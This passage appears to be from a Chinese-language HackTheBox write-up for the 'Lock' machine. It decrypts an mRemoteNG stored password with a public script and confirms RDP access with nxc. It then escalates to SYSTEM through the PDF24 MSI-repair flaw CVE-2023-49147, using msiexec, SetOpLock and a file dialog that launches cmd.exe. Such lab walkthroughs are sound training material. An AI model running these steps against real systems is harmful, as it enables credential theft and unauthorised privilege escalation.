Cloning into 'mRemoteNG-Decrypt'...
remote: Enumerating objects: 19, done.
remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 19 (from 1)
Receiving objects: 100% (19/19), 14.80 KiB | 7.40 MiB/s, done.
Resolving deltas: 100% (4/4), done.
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# cd mRemoteNG-Decrypt
┌──(root㉿kali)-[~/Desktop/htb/lock/mRemoteNG-Decrypt]
└─# python3 mremoteng_decrypt.py -s "TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw=="
Password: ty8wnW9qCKDosXo6
┌──(root㉿kali)-[~/Desktop/htb/lock/mRemoteNG-Decrypt]
└─# nxc rdp 10.129.234.64 -u Gale.Dekarios -p ty8wnW9qCKDosXo6
RDP 10.129.234.64 3389 LOCK [*] Windows 10 or Windows Server 2016 Build 20348 (name:LOCK) (domain:Lock) (nla:False)
RDP 10.129.234.64 3389 LOCK [+] Lock\Gale.Dekarios:ty8wnW9qCKDosXo6 (Pwn3d!)
2. System
2.1. rdp to Gale.Dekarios
2.2. CVE-2023-49147 PDF24 Local Privilege Escalation
CVE-2023-49147
进来就发现有这个 PDF24 Toolbox 的软件,这多半是一个利用点
获取一下版本 11.15.1
那没得泡了,就这个提权的
参考这个进行复现即可
Local Privilege Escalation via MSI installer in PDF24 Creator (geek Software GmbH) - SEC Consult
msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi
然后运行这个命令
SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r
出现提示选第二个
然后会卡在这里
右键 “属性”,然后点这个
这里不能用ie edge打开
然后 ctrl+o 输入 cmd.exe
下载好后打开就是 system 权限
